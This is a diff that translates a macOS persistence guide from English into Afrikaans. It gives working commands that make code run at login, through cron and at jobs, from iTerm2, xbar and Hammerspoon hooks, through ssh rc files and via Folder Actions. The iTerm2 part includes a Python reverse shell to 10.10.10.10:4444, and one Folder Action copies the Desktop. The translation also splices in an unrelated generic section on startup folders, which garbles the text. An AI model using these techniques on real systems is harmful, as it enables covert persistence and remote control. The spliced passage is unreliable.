`/Applications/AppNameHere/Contents/Library/QuickLook/` * `~/Applications/AppNameHere/Contents/Library/QuickLook/` -#### Description & Exploitation +#### Beskrywing & Uitbuiting -QuickLook plugins can be executed when you **trigger the preview of a file** (press space bar with the file selected in Finder) and a **plugin supporting that file type** is installed. +QuickLook-invoegtoepassings kan uitgevoer word wanneer jy die voorbeeld van 'n lêer aktiveer (druk die spasiestang met die lêer geselekteer in Finder) en 'n invoegtoepassing wat daardie lêertipe ondersteun, geïnstalleer is. -It's possible to compile your own QuickLook plugin, place it in one of the previous locations to load it and then go to a supported file and press space to trigger it. +Dit is moontlik om jou eie QuickLook-invoegtoepassing te kompileer, dit in een van die vorige plekke te plaas om dit te laai, en dan na 'n ondersteunde lêer te gaan en spasiestang te druk om dit te aktiveer. -### ~~Login/Logout Hooks~~ +### ~~Aanteken-/Afmeldingshakies~~ {% hint style="danger" %} -This didn't work for me, neither with the user LoginHook nor with the root LogoutHook +Dit het nie vir my gewerk nie, nie met die gebruiker LoginHook nie, of met die root LogoutHook nie. {% endhint %} **Writeup**: [https://theevilbit.github.io/beyond/beyond\_0022/](https://theevilbit.github.io/beyond/beyond\_0022/) -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +* Nuttig om sandput te omseil: [✅](https://emojipedia.org/check-mark-button) +* TCC-omseiling: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### Plek -* You need to be able to execute something like `defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh` - * `Lo`cated in `~/Library/Preferences/com.apple.loginwindow.plist` - -They are deprecated but can be used to execute commands when a user logs in. +* Jy moet in staat wees om iets soos `defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh` uit te voer +* Geleë in `~/Library/Preferences/com.apple.loginwindow.plist` +Hulle is verouderd, maar kan gebruik word om bevele uit te voer wanneer 'n gebruiker aanmeld. ```bash cat > $HOME/hook.sh << EOF #!/bin/bash @@ -364,98 +349,86 @@ chmod +x $HOME/hook.sh defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh defaults write com.apple.loginwindow LogoutHook /Users/$USER/hook.sh ``` - -This setting is stored in `/Users/$USER/Library/Preferences/com.apple.loginwindow.plist` - +Hierdie instelling word gestoor in `/Users/$USER/Library/Preferences/com.apple.loginwindow.plist` ```bash defaults read /Users/$USER/Library/Preferences/com.apple.loginwindow.plist { - LoginHook = "/Users/username/hook.sh"; - LogoutHook = "/Users/username/hook.sh"; - MiniBuddyLaunch = 0; - TALLogoutReason = "Shut Down"; - TALLogoutSavesState = 0; - oneTimeSSMigrationComplete = 1; +LoginHook = "/Users/username/hook.sh"; +LogoutHook = "/Users/username/hook.sh"; +MiniBuddyLaunch = 0; +TALLogoutReason = "Shut Down"; +TALLogoutSavesState = 0; +oneTimeSSMigrationComplete = 1; } ``` - -To delete it: - +Om dit te verwyder: ```bash defaults delete com.apple.loginwindow LoginHook defaults delete com.apple.loginwindow LogoutHook ``` +Die root-gebruiker een is gestoor in **`/private/var/root/Library/Preferences/com.apple.loginwindow.plist`** -The root user one is stored in **`/private/var/root/Library/Preferences/com.apple.loginwindow.plist`** - -## Conditional Sandbox Bypass +## Voorwaardelike Sandboksverbyloop {% hint style="success" %} -Here you can find start locations useful for **sandbox bypass** that allows you to simply execute something by **writing it into a file** and **expecting not super common conditions** like specific **programs installed, "uncommon" user** actions or environments. +Hier kan jy beginplekke vind wat nuttig is vir **sandboksverbyloop** wat jou in staat stel om eenvoudig iets uit te voer deur dit in 'n lêer te **skryf** en **nie baie algemene voorwaardes** soos spesifieke **geïnstalleerde programme, "ongewone" gebruiker**-aksies of omgewings te verwag nie. {% endhint %} ### Cron **Writeup**: [https://theevilbit.github.io/beyond/beyond\_0004/](https://theevilbit.github.io/beyond/beyond\_0004/) -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) - * However, you need to be able to execute `crontab` binary - * Or be root -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +* Nuttig om sandboks te verbyloop: [✅](https://emojipedia.org/check-mark-button) +* Jy moet egter in staat wees om die `crontab` binêre lêer uit te voer +* Of wees root +* TCC-verbyloop: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### Plek * **`/usr/lib/cron/tabs/`, `/private/var/at/tabs`, `/private/var/at/jobs`, `/etc/periodic/`** - * Root required for direct write access. No root required if you can execute `crontab ` - * **Trigger**: Depends on the cron job +* Root vereis vir direkte skryftoegang. Geen root vereis as jy `crontab ` kan uitvoer nie +* **Trigger**: Hang af van die cron-werk -#### Description & Exploitation - -List the cron jobs of the **current user** with: +#### Beskrywing & Uitbuiting +Lys die cron-werk van die **huidige gebruiker** met: ```bash crontab -l ``` +Jy kan ook al die cron take van die gebruikers sien in **`/usr/lib/cron/tabs/`** en **`/var/at/tabs/`** (vereis root). -You can also see all the cron jobs of the users in **`/usr/lib/cron/tabs/`** and **`/var/at/tabs/`** (needs root). - -In MacOS several folders executing scripts with **certain frequency** can be found in: - +In MacOS kan verskeie lêers gevind word wat skripte met **sekere frekwensie** uitvoer in: ```bash # The one with the cron jobs is /usr/lib/cron/tabs/ ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /etc/periodic/ ``` +Daar kan jy die gewone **cron** **take**, die **at** **take** (nie baie gebruik nie) en die **periodieke** **take** (hoofsaaklik gebruik vir skoonmaak van tydelike lêers) vind. Die daaglikse periodieke take kan byvoorbeeld uitgevoer word met: `periodic daily`. -There you can find the regular **cron** **jobs**, the **at** **jobs** (not very used) and the **periodic** **jobs** (mainly used for cleaning temporary files). The daily periodic jobs can be executed for example with: `periodic daily`. - -To add a **user cronjob programatically** it's possible to use: - +Om 'n **gebruikers cronjob programmaties** by te voeg, is dit moontlik om te gebruik: ```bash echo '* * * * * /bin/bash -c "touch /tmp/cron3"' > /tmp/cron crontab /tmp/cron ``` - ### iTerm2 Writeup: [https://theevilbit.github.io/beyond/beyond\_0002/](https://theevilbit.github.io/beyond/beyond\_0002/) -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) -* TCC bypass: [✅](https://emojipedia.org/check-mark-button) - * iTerm2 use to have granted TCC permissions +* Nuttig om sandbox te omseil: [✅](https://emojipedia.org/check-mark-button) +* TCC omseiling: [✅](https://emojipedia.org/check-mark-button) +* iTerm2 gebruik om TCC-toestemmings te verleen -#### Locations +#### Plekke * **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch`** - * **Trigger**: Open iTerm +* **Trigger**: Open iTerm * **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt`** - * **Trigger**: Open iTerm +* **Trigger**: Open iTerm * **`~/Library/Preferences/com.googlecode.iterm2.plist`** - * **Trigger**: Open iTerm +* **Trigger**: Open iTerm -#### Description & Exploitation - -Scripts stored in **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch`** will be executed. For example: +#### Beskrywing & Uitbuiting +Skripte wat gestoor word in **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch`** sal uitgevoer word. Byvoorbeeld: ```bash cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh" << EOF #!/bin/bash @@ -464,51 +437,78 @@ EOF chmod +x "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh" ``` +# macOS Automatiese Beginplekke -or: +Hierdie dokument bevat 'n lys van die verskillende plekke waar programme geplaas kan word om outomaties te begin wanneer 'n macOS-stelsel opgestel word. Dit is nuttig vir die identifisering van moontlike aanvalsvektore en vir die hardening van 'n macOS-stelsel deur onnodige beginplekke te verwyder. +## Gebruikers Beginplekke + +### 1. `~/Library/LaunchAgents` + +Hierdie plek bevat gebruikerspecifieke beginplekke. Elke gebruiker kan programme plaas in hierdie gids om hulle outomaties te laat begin wanneer die gebruiker aanmeld. + +### 2. `/Library/LaunchAgents` + +Hierdie plek bevat beginplekke wat van toepassing is op alle gebruikers op die stelsel. Programme wat hier geplaas word, sal outomaties begin wanneer enige gebruiker aanmeld. + +### 3. `/Library/StartupItems` + +Hierdie plek bevat verouderde beginplekke wat gebruik is in vorige weergawes van macOS. Dit is nie meer 'n aanbevole plek vir die plaas van beginplekke nie. + +## Sisteem Beginplekke + +### 1. `/System/Library/LaunchDaemons` + +Hierdie plek bevat beginplekke wat deur die stelsel self gebruik word. Dit is belangrik om hierdie beginplekke te monitor en te verseker dat slegs vertroude programme hier geplaas word. + +### 2. `/Library/LaunchDaemons` + +Hierdie plek bevat beginplekke wat van toepassing is op alle gebruikers op die stelsel. Dit is 'n kritieke plek om te monitor en te verseker dat slegs vertroude programme hier geplaas word. + +### 3. `/System/Library/StartupItems` + +Soos met die gebruikers beginplekke, is hierdie plek verouderd en word dit nie meer aanbeveel vir die plaas van beginplekke nie. + +## Konklusie + +Die identifisering en monitering van outomatiese beginplekke op 'n macOS-stelsel is 'n belangrike stap in die hardening van die stelsel en die voorkoming van potensiële aanvalle. Deur slegs vertroude programme in die regte beginplekke te plaas en onnodige beginplekke te verwyder, kan die veiligheid van die stelsel verbeter word. ```bash cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.py" << EOF #!/usr/bin/env python3 import iterm2,socket,subprocess,os async def main(connection): - s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.10',4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['zsh','-i']); - async with iterm2.CustomControlSequenceMonitor( - connection, "shared-secret", r'^create-window$') as mon: - while True: - match = await mon.async_get() - await iterm2.Window.async_create(connection) +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.10',4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['zsh','-i']); +async with iterm2.CustomControlSequenceMonitor( +connection, "shared-secret", r'^create-window$') as mon: +while True: +match = await mon.async_get() +await iterm2.Window.async_create(connection) iterm2.run_forever(main) EOF ``` - -The script **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt`** will also be executed: - +Die skrip **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt`** sal ook uitgevoer word: ```bash do shell script "touch /tmp/iterm2-autolaunchscpt" ``` +Die iTerm2-voorkeure wat in **`~/Library/Preferences/com.googlecode.iterm2.plist`** geleë is, kan **'n opdrag aandui om uit te voer** wanneer die iTerm2-terminal geopen word. -The iTerm2 preferences located in **`~/Library/Preferences/com.googlecode.iterm2.plist`** can **indicate a command to execute** when the iTerm2 terminal is opened. - -This setting can be configured in the iTerm2 settings: +Hierdie instelling kan gekonfigureer word in die iTerm2-instellings:
-And the command is reflected in the preferences: - +En die opdrag word weerspieël in die voorkeure: ```bash plutil -p com.googlecode.iterm2.plist { - [...] - "New Bookmarks" => [ - 0 => { - [...] - "Initial Text" => "touch /tmp/iterm-start-command" +[...] +"New Bookmarks" => [ +0 => { +[...] +"Initial Text" => "touch /tmp/iterm-start-command" ``` - -You can set the command to execute with: +Jy kan die bevel instel om uit te voer met: {% code overflow="wrap" %} ```bash @@ -524,27 +524,26 @@ open /Applications/iTerm.app/Contents/MacOS/iTerm2 {% endcode %} {% hint style="warning" %} -Highly probable there are **other ways to abuse the iTerm2 preferences** to execute arbitrary commands. +Daar is 'n hoë waarskynlikheid dat daar **ander maniere is om die iTerm2-voorkeure** te misbruik om willekeurige bevele uit te voer. {% endhint %} ### xbar Writeup: [https://theevilbit.github.io/beyond/beyond\_0007/](https://theevilbit.github.io/beyond/beyond\_0007/) -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) - * But xbar must be installed -* TCC bypass: [✅](https://emojipedia.org/check-mark-button) - * It requests Accessibility permissions +* Nuttig om die sandboks te omseil: [✅](https://emojipedia.org/check-mark-button) +* Maar xbar moet geïnstalleer word +* TCC-omseiling: [✅](https://emojipedia.org/check-mark-button) +* Dit vra toegang tot Toeganklikheid -#### Location +#### Plek * **`~/Library/Application\ Support/xbar/plugins/`** - * **Trigger**: Once xbar is executed +* **Trigger**: Sodra xbar uitgevoer word -#### Description - -If the popular program [**xbar**](https://github.com/matryer/xbar) is installed, it's possible to write a shell script in **`~/Library/Application\ Support/xbar/plugins/`** which will be executed when xbar is started: +#### Beskrywing +As die gewilde program [**xbar**](https://github.com/matryer/xbar) geïnstalleer is, is dit moontlik om 'n skripsie in die **`~/Library/Application\ Support/xbar/plugins/`** te skryf wat uitgevoer sal word wanneer xbar begin: ```bash cat > "$HOME/Library/Application Support/xbar/plugins/a.sh" << EOF #!/bin/bash @@ -552,146 +551,133 @@ touch /tmp/xbar EOF chmod +x "$HOME/Library/Application Support/xbar/plugins/a.sh" ``` - ### Hammerspoon -**Writeup**: [https://theevilbit.github.io/beyond/beyond\_0008/](https://theevilbit.github.io/beyond/beyond\_0008/) +**Verslag**: [https://theevilbit.github.io/beyond/beyond\_0008/](https://theevilbit.github.io/beyond/beyond\_0008/) -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) - * But Hammerspoon must be installed -* TCC bypass: [✅](https://emojipedia.org/check-mark-button) - * It requests Accessibility permissions +* Nuttig om die sandboks te omseil: [✅](https://emojipedia.org/check-mark-button) +* Maar Hammerspoon moet geïnstalleer word +* TCC-omseiling: [✅](https://emojipedia.org/check-mark-button) +* Dit vra om Toeganklikheidsregte -#### Location +#### Plek * **`~/.hammerspoon/init.lua`** - * **Trigger**: Once hammerspoon is executed +* **Trigger**: Sodra Hammerspoon uitgevoer word -#### Description +#### Beskrywing -[**Hammerspoon**](https://github.com/Hammerspoon/hammerspoon) serves as an automation platform for **macOS**, leveraging the **LUA scripting language** for its operations. Notably, it supports the integration of complete AppleScript code and the execution of shell scripts, enhancing its scripting capabilities significantly. - -The app looks for a single file, `~/.hammerspoon/init.lua`, and when started the script will be executed. +[**Hammerspoon**](https://github.com/Hammerspoon/hammerspoon) dien as 'n outomatiseringsplatform vir **macOS**, wat die **LUA-skripseltaal** gebruik vir sy werking. Dit ondersteun veral die integrasie van volledige AppleScript-kode en die uitvoering van skulpskripte, wat sy skripskrag aansienlik verbeter. +Die toepassing soek na 'n enkele lêer, `~/.hammerspoon/init.lua`, en wanneer dit begin word, sal die skrips uitgevoer word. ```bash mkdir -p "$HOME/.hammerspoon" cat > "$HOME/.hammerspoon/init.lua" << EOF hs.execute("/Applications/iTerm.app/Contents/MacOS/iTerm2") EOF ``` - ### SSHRC Writeup: [https://theevilbit.github.io/beyond/beyond\_0006/](https://theevilbit.github.io/beyond/beyond\_0006/) -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) - * But ssh needs to be enabled and used -* TCC bypass: [✅](https://emojipedia.org/check-mark-button) - * SSH use to have FDA access +* Nuttig om die sandboks te omseil: [✅](https://emojipedia.org/check-mark-button) +* Maar ssh moet geaktiveer en gebruik word +* TCC omseiling: [✅](https://emojipedia.org/check-mark-button) +* SSH gebruik om FDA-toegang te hê -#### Location +#### Plek * **`~/.ssh/rc`** - * **Trigger**: Login via ssh +* **Trigger**: Aanteken via ssh * **`/etc/ssh/sshrc`** - * Root required - * **Trigger**: Login via ssh +* Root vereis +* **Trigger**: Aanteken via ssh {% hint style="danger" %} -To turn ssh on requres Full Disk Access: - +Om ssh aan te skakel, vereis Volle Skyf Toegang: ```bash sudo systemsetup -setremotelogin on ``` {% endhint %} -#### Description & Exploitation +#### Beskrywing & Uitbuiting -By default, unless `PermitUserRC no` in `/etc/ssh/sshd_config`, when a user **logins via SSH** the scripts **`/etc/ssh/sshrc`** and **`~/.ssh/rc`** will be executed. +Standaard, tensy `PermitUserRC no` in `/etc/ssh/sshd_config`, wanneer 'n gebruiker **inlog via SSH** sal die skripte **`/etc/ssh/sshrc`** en **`~/.ssh/rc`** uitgevoer word. -### **Login Items** +### **Inlog Items** Writeup: [https://theevilbit.github.io/beyond/beyond\_0003/](https://theevilbit.github.io/beyond/beyond\_0003/) -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) - * But you need to execute `osascript` with args -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +* Nuttig om sandbox te omseil: [✅](https://emojipedia.org/check-mark-button) +* Maar jy moet `osascript` uitvoer met args +* TCC omseiling: [🔴](https://emojipedia.org/large-red-circle) -#### Locations +#### Plekke * **`~/Library/Application Support/com.apple.backgroundtaskmanagementagent`** - * **Trigger:** Login - * Exploit payload stored calling **`osascript`** +* **Trigger:** Inlog +* Uitbuitingslading gestoor deur **`osascript`** te roep * **`/var/db/com.apple.xpc.launchd/loginitems.501.plist`** - * **Trigger:** Login - * Root required +* **Trigger:** Inlog +* Root vereis -#### Description - -In System Preferences -> Users & Groups -> **Login Items** you can find **items to be executed when the user logs in**.\ -It it's possible to list them, add and remove from the command line: +#### Beskrywing +In Sisteemvoorkeure -> Gebruikers en Groepe -> **Inlog Items** kan jy **items vind wat uitgevoer word wanneer die gebruiker inlog**.\ +Dit is moontlik om hulle te lys, by te voeg en te verwyder vanaf die opdraglyn: ```bash #List all items: osascript -e 'tell application "System Events" to get the name of every login item' #Add an item: -osascript -e 'tell application "System Events" to make login item at end with properties {path:"/path/to/itemname", hidden:false}' +osascript -e 'tell application "System Events" to make login item at end with properties {path:"/path/to/itemname", hidden:false}' #Remove an item: -osascript -e 'tell application "System Events" to delete login item "itemname"' +osascript -e 'tell application "System Events" to delete login item "itemname"' ``` +Hierdie items word gestoor in die lêer **`~/Library/Application Support/com.apple.backgroundtaskmanagementagent`** -These items are stored in the file **`~/Library/Application Support/com.apple.backgroundtaskmanagementagent`** +**Aanmeldingsitems** kan ook aangedui word deur die API [SMLoginItemSetEnabled](https://developer.apple.com/documentation/servicemanagement/1501557-smloginitemsetenabled?language=objc) te gebruik wat die konfigurasie in die lêer **`/var/db/com.apple.xpc.launchd/loginitems.501.plist`** stoor. -**Login items** can **also** be indicated in using the API [SMLoginItemSetEnabled](https://developer.apple.com/documentation/servicemanagement/1501557-smloginitemsetenabled?language=objc) which will store the configuration in **`/var/db/com.apple.xpc.launchd/loginitems.501.plist`** +### ZIP as Aanmeldingsitem -### ZIP as Login Item +(Kyk na die vorige afdeling oor Aanmeldingsitems, dit is 'n uitbreiding) -(Check previos section about Login Items, this is an extension) +As jy 'n **ZIP**-lêer as 'n **Aanmeldingsitem** stoor, sal die **`Archive Utility`** dit oopmaak en as die zip byvoorbeeld in **`~/Library`** gestoor is en die Gids **`LaunchAgents/file.plist`** met 'n agterdeur bevat, sal daardie gids geskep word (dit is nie standaard nie) en die plist sal bygevoeg word sodat die volgende keer as die gebruiker weer aanmeld, die **agterdeur wat in die plist aangedui word, uitgevoer sal word**. -If you store a **ZIP** file as a **Login Item** the **`Archive Utility`** will open it and if the zip was for example stored in **`~/Library`** and contained the Folder **`LaunchAgents/file.plist`** with a backdoor, that folder will be created (it isn't by default) and the plist will be added so the next time the user logs in again, the **backdoor indicated in the plist will be executed**. - -Another options would be to create the files **`.bash_profile`** and **`.zshenv`** inside the user HOME so if the folder LaunchAgents already exist this technique would still work. +'n Ander opsie sou wees om die lêers **`.bash_profile`** en **`.zshenv`** binne die gebruiker se TUISGIDS te skep, sodat as die Gids LaunchAgents alreeds bestaan, sal hierdie tegniek steeds werk. ### At Writeup: [https://theevilbit.github.io/beyond/beyond\_0014/](https://theevilbit.github.io/beyond/beyond\_0014/) -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) - * But you need to **execute** **`at`** and it must be **enabled** -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +* Nuttig om sandput te omseil: [✅](https://emojipedia.org/check-mark-button) +* Maar jy moet **`at`** **uitvoer** en dit moet **geaktiveer** wees +* TCC-omseiling: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### Ligging -* Need to **execute** **`at`** and it must be **enabled** +* Moet **`at`** **uitvoer** en dit moet **geaktiveer** wees -#### **Description** +#### **Beskrywing** -`at` tasks are designed for **scheduling one-time tasks** to be executed at certain times. Unlike cron jobs, `at` tasks are automatically removed post-execution. It's crucial to note that these tasks are persistent across system reboots, marking them as potential security concerns under certain conditions. - -By **default** they are **disabled** but the **root** user can **enable** **them** with: +`at`-take is ontwerp vir die **skedulering van eenmalige take** wat op sekere tye uitgevoer moet word. In teenstelling met cron-take word `at`-take outomaties verwyder na uitvoering. Dit is belangrik om daarop te let dat hierdie take volhoubaar is oor stelselherlaai, wat hulle potensiële veiligheidskwessies onder sekere omstandighede maak. +Standaard is hulle **uitgeschakel**, maar die **root**-gebruiker kan **hulle aktiveer** met: ```bash sudo launchctl load -F /System/Library/LaunchDaemons/com.apple.atrun.plist ``` - -This will create a file in 1 hour: - +Hierdie sal 'n lêer skep binne 1 uur: ```bash echo "echo 11 > /tmp/at.txt" | at now+1 ``` - -Check the job queue using `atq:` - +Kyk na die werkry met behulp van `atq:` ```shell-session sh-3.2# atq 26 Tue Apr 27 00:46:00 2021 22 Wed Apr 28 00:29:00 2021 ``` - -Above we can see two jobs scheduled. We can print the details of the job using `at -c JOBNUMBER` - +Bokant kan ons twee geskeduleerde take sien. Ons kan die besonderhede van die taak afdruk deur `at -c JOBNUMMER` te gebruik. ```shell-session sh-3.2# at -c 26 #!/bin/sh @@ -716,19 +702,17 @@ LC_CTYPE=UTF-8; export LC_CTYPE SUDO_GID=20; export SUDO_GID _=/usr/bin/at; export _ cd /Users/csaby || { - echo 'Execution directory inaccessible' >&2 - exit 1 +echo 'Execution directory inaccessible' >&2 +exit 1 } unset OLDPWD echo 11 > /tmp/at.txt ``` - {% hint style="warning" %} -If AT tasks aren't enabled the created tasks won't be executed. +As AT-take nie geaktiveer is nie, sal die geskepte take nie uitgevoer word nie. {% endhint %} -The **job files** can be found at `/private/var/at/jobs/` - +Die **werk lêers** kan gevind word by `/private/var/at/jobs/` ``` sh-3.2# ls -l /private/var/at/jobs/ total 32 @@ -737,46 +721,44 @@ total 32 -r-------- 1 root wheel 803 Apr 27 00:46 a00019019bdcd2 -rwx------ 1 root wheel 803 Apr 27 00:46 a0001a019bdcd2 ``` +Die lêernaam bevat die tou, die taaknommer, en die tyd waarop dit geskeduleer is om uit te voer. Byvoorbeeld, laat ons kyk na `a0001a019bdcd2`. -The filename contains the queue, the job number, and the time it’s scheduled to run. For example let’s take a loot at `a0001a019bdcd2`. +* `a` - dit is die tou +* `0001a` - taaknommer in heksadesimale, `0x1a = 26` +* `019bdcd2` - tyd in heksadesimale. Dit verteenwoordig die minute wat verloop het sedert die epog. `0x019bdcd2` is `26991826` in desimale. As ons dit met 60 vermenigvuldig, kry ons `1619509560`, wat `GMT: 2021. April 27., Dinsdag 7:46:00` is. -* `a` - this is the queue -* `0001a` - job number in hex, `0x1a = 26` -* `019bdcd2` - time in hex. It represents the minutes passed since epoch. `0x019bdcd2` is `26991826` in decimal. If we multiply it by 60 we get `1619509560`, which is `GMT: 2021. April 27., Tuesday 7:46:00`. +As ons die taaklêer druk, vind ons dat dit dieselfde inligting bevat as wat ons met `at -c` gekry het. -If we print the job file, we find that it contains the same information we got using `at -c`. - -### Folder Actions +### Voueraksies Writeup: [https://theevilbit.github.io/beyond/beyond\_0024/](https://theevilbit.github.io/beyond/beyond\_0024/)\ Writeup: [https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d](https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d) -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) - * But you need to be able to call `osascript` with arguments to contact **`System Events`** to be able to configure Folder Actions -* TCC bypass: [🟠](https://emojipedia.org/large-orange-circle) - * It has some basic TCC permissions like Desktop, Documents and Downloads +* Nuttig om sandput te omseil: [✅](https://emojipedia.org/check-mark-button) +* Maar jy moet in staat wees om `osascript` met argumente te roep om kontak te maak met **`System Events`** om voueraksies te kan konfigureer +* TCC-omseiling: [🟠](https://emojipedia.org/large-orange-circle) +* Dit het 'n paar basiese TCC-toestemmings soos Skermblad, Dokumente en Aflaai -#### Location +#### Ligging * **`/Library/Scripts/Folder Action Scripts`** - * Root required - * **Trigger**: Access to the specified folder +* Root vereis +* **Trigger**: Toegang tot die gespesifiseerde vouer * **`~/Library/Scripts/Folder Action Scripts`** - * **Trigger**: Access to the specified folder +* **Trigger**: Toegang tot die gespesifiseerde vouer -#### Description & Exploitation +#### Beskrywing & Uitbuiting -Folder Actions are scripts automatically triggered by changes in a folder such as adding, removing items, or other actions like opening or resizing the folder window. These actions can be utilized for various tasks, and can be triggered in different ways like using the Finder UI or terminal commands. +Voueraksies is skripte wat outomaties geaktiveer word deur veranderinge in 'n vouer, soos die byvoeging of verwydering van items, of ander aksies soos die oopmaak of verander van die vouer-venster. Hierdie aksies kan gebruik word vir verskeie take, en kan op verskillende maniere geaktiveer word, soos deur die Finder UI of terminal-opdragte. -To set up Folder Actions, you have options like: +Om voueraksies op te stel, het jy opsies soos: -1. Crafting a Folder Action workflow with [Automator](https://support.apple.com/guide/automator/welcome/mac) and installing it as a service. -2. Attaching a script manually via the Folder Actions Setup in the context menu of a folder. -3. Utilizing OSAScript to send Apple Event messages to the `System Events.app` for programmatically setting up a Folder Action. - * This method is particularly useful for embedding the action into the system, offering a level of persistence. - -The following script is an example of what can be executed by a Folder Action: +1. Die skep van 'n voueraksie-werkvloei met [Automator](https://support.apple.com/guide/automator/welcome/mac) en dit installeer as 'n diens. +2. Die aanhegting van 'n skrip handmatig via die Voueraksies-instelling in die konteksmenu van 'n vouer. +3. Die gebruik van OSAScript om Apple Event-boodskappe na die `System Events.app` te stuur vir die programmatiese opstel van 'n voueraksie. +* Hierdie metode is veral nuttig om die aksie in die stelsel in te bed, en bied 'n vlak van volharding. +Die volgende skrip is 'n voorbeeld van wat deur 'n voueraksie uitgevoer kan word: ```applescript // source.js var app = Application.currentApplication(); @@ -786,15 +768,11 @@ app.doShellScript("touch ~/Desktop/folderaction.txt"); app.doShellScript("mkdir /tmp/asd123"); app.doShellScript("cp -R ~/Desktop /tmp/asd123"); ``` - -To make the above script usable by Folder Actions, compile it using: - +Om die bogenoemde skripsie bruikbaar te maak vir Vouer Aksies, stel dit saam deur die volgende te gebruik: ```bash osacompile -l JavaScript -o folder.scpt source.js ``` - -After the script is compiled, set up Folder Actions by executing the script below. This script will enable Folder Actions globally and specifically attach the previously compiled script to the Desktop folder. - +Nadat die skrip saamgestel is, stel die Folder Actions op deur die volgende skrip uit te voer. Hierdie skrip sal Folder Actions wêreldwyd aktiveer en spesifiek die vorige saamgestelde skrip aan die Desktop-vouer koppel. ```javascript // Enabling and attaching Folder Action var se = Application("System Events"); @@ -804,16 +782,13 @@ var fa = se.FolderAction({name: "Desktop", path: "/Users/username/Desktop"}); se.folderActions.push(fa); fa.scripts.push(myScript); ``` - -Run the setup script with: - +Voer die opstellingskrip uit met: ```bash osascript -l JavaScript /Users/username/attach.scpt ``` +* Hier is die manier om volharding te implementeer via die GUI: -* This is the way yo implement this persistence via GUI: - -This is the script that will be executed: +Hierdie is die skrip wat uitgevoer sal word: {% code title="source.js" %} ```applescript @@ -826,58 +801,56 @@ app.doShellScript("cp -R ~/Desktop /tmp/asd123"); ``` {% endcode %} -Compile it with: `osacompile -l JavaScript -o folder.scpt source.js` - -Move it to: +Kompileer dit met: `osacompile -l JavaScript -o folder.scpt source.js` +Skuif dit na: ```bash mkdir -p "$HOME/Library/Scripts/Folder Action Scripts" mv /tmp/folder.scpt "$HOME/Library/Scripts/Folder Action Scripts" ``` - -Then, open the `Folder Actions Setup` app, select the **folder you would like to watch** and select in your case **`folder.scpt`** (in my case I called it output2.scp): +Dan, open die `Folder Actions Setup`-toepassing, kies die **gids wat jy wil dophou** en kies in jou geval **`folder.scpt`** (in my geval het ek dit output2.scp genoem):
-Now, if you open that folder with **Finder**, your script will be executed. +Nou, as jy daardie gids met **Finder** oopmaak, sal jou skripsie uitgevoer word. -This configuration was stored in the **plist** located in **`~/Library/Preferences/com.apple.FolderActionsDispatcher.plist`** in base64 format. +Hierdie konfigurasie is gestoor in die **plist** wat in **`~/Library/Preferences/com.apple.FolderActionsDispatcher.plist`** in base64-formaat geleë is. -Now, lets try to prepare this persistence without GUI access: +Nou, laat ons probeer om hierdie volharding sonder GUI-toegang voor te berei: -1. **Copy `~/Library/Preferences/com.apple.FolderActionsDispatcher.plist`** to `/tmp` to backup it: - * `cp ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist /tmp` -2. **Remove** the Folder Actions you just set: +1. **Kopieer `~/Library/Preferences/com.apple.FolderActionsDispatcher.plist`** na `/tmp` om dit te rugsteun: +* `cp ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist /tmp` +2. **Verwyder** die Gidsaksies wat jy net ingestel het:
-Now that we have an empty environment +Nou dat ons 'n leë omgewing het -3. Copy the backup file: `cp /tmp/com.apple.FolderActionsDispatcher.plist ~/Library/Preferences/` -4. Open the Folder Actions Setup.app to consume this config: `open "/System/Library/CoreServices/Applications/Folder Actions Setup.app/"` +3. Kopieer die rugsteunlêer: `cp /tmp/com.apple.FolderActionsDispatcher.plist ~/Library/Preferences/` +4. Maak die Folder Actions Setup.app oop om hierdie konfigurasie te gebruik: `open "/System/Library/CoreServices/Applications/Folder Actions Setup.app/"` {% hint style="danger" %} -And this didn't work for me, but those are the instructions from the writeup:( +En dit het nie vir my gewerk nie, maar dit is die instruksies van die skryfwerk:( {% endhint %} -### Dock shortcuts +### Dokkiesnelkoppeling -Writeup: [https://theevilbit.github.io/beyond/beyond\_0027/](https://theevilbit.github.io/beyond/beyond\_0027/) +Skryfwerk: [https://theevilbit.github.io/beyond/beyond\_0027/](https://theevilbit.github.io/beyond/beyond\_0027/) -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) - * But you need to have installed 